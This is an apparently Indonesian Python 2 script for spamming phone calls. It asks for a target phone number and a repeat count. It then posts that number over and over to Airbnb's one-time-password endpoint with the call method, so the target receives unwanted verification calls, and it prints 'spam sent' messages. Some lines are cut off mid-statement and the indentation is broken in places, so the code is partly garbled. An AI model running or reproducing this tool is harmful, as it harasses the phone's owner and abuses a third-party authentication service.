M = '\033[1;31m'
H = '\033[1;32m'
K = '\033[1;33m'
U = '\033[1;34m'
P = '\033[1;35m'
C = '\033[1;36m'
W = '\033[1;37m'
A = '\033[90m'

from requests.exceptions import ConnectionError
from cookielib import LWPCookieJar as Cookie
from time import sleep
import platform, requests, random, sys, os

if platform.system() == 'Linux':
        clear = 'clear'

elif platform.system() == 'Windows':
        clear = 'cls'

else:
        pass

def tiks(s):
        for x in s + '\n':                                                                                                                                   sys.stdout.write(x)
                sys.stdout.flush()
                sleep(random.random() * 0.01)

def main():

        try:
                print
                pilih = raw_input(W+'Mau lanjut ( y/n )'+C+' : '+W+'')

                if pilih == 'y':

                        print

                        phone = raw_input(W+'NOMOR TARGET ('+H+' Ex :'+C+' 62812xxxx '+W+') : ')
                        jumlah = input(''+W+'JUMLAH SPAM'+W+' ('+H+' Ex :'+C+' 3 '+W+') : ')

                        if jumlah > 3:
                                print
                                print(W+'Jumlah Melewati Limit'+C+' ^_^')
                                sleep(3)
                                main()

                        elif len(phone) < 10:
                                print
                                print(M+'\tNomor Tidak Valid !')
                                sys.exit()

                        elif '62' not in phone[0:2]:
                                print
                                print(C+'Pakai 62'+W+' !')
                                sleep(2.5)
                                main()

                        else:
                                pass

                        print
                        for _ in range(int(jumlah)):

                                sleep(5)

                                data = {
                                'phoneNumber' : phone,
                                'workFlow' : 'GLOBAL_SIGNUP_LOGIN',
                                'otpMethod' : 'CALL'
                                }

                                Cookies = Cookie('.cookieslog','w')
                                Sess = requests.Session()
                                Sess.cookies = Cookies
                                Sess.headers = {'User-Agent' : 'Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0;                        >

                                send = Sess.post('https://www.airbnb.co.id/api/v2/phone_one_time_passwords?currency=U                       >

                                if 'error' in send.text:
                                        print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(phone)+W+' GAGAL'+M+' \xE2                       >

                                else:
                                        print(W+'['+C+'*'+W+'] KIRIM SPAM KE NOMOR '+C+str(phone)+W+' BERHASIL'+H+' \                       >
                                        Cookies.save()

                elif pilih == 'n' or pilih == 'N':
                        print
                        print(W+'Thanks, Jangan Lupa Balik Lagi'+C+' ^_^')
                        sys.exit()

                else:
                        print
                        print(W+'Tools Tidak Di Temukan '+C+'^_^')
                        sys.exit()

        except ConnectionError:
                print
                print(M+' Jaringan Tidak Ada  !')
                sys.exit()

        except ValueError:
                 print
                print(M+' Yang Anda Masukkan Salah  !')
                sleep(3)
                main()

        except NameError:
                print
                print(M+' Masukkan Angka !')
                sleep(3)
                main()

if __name__ == '__main__':
                main()
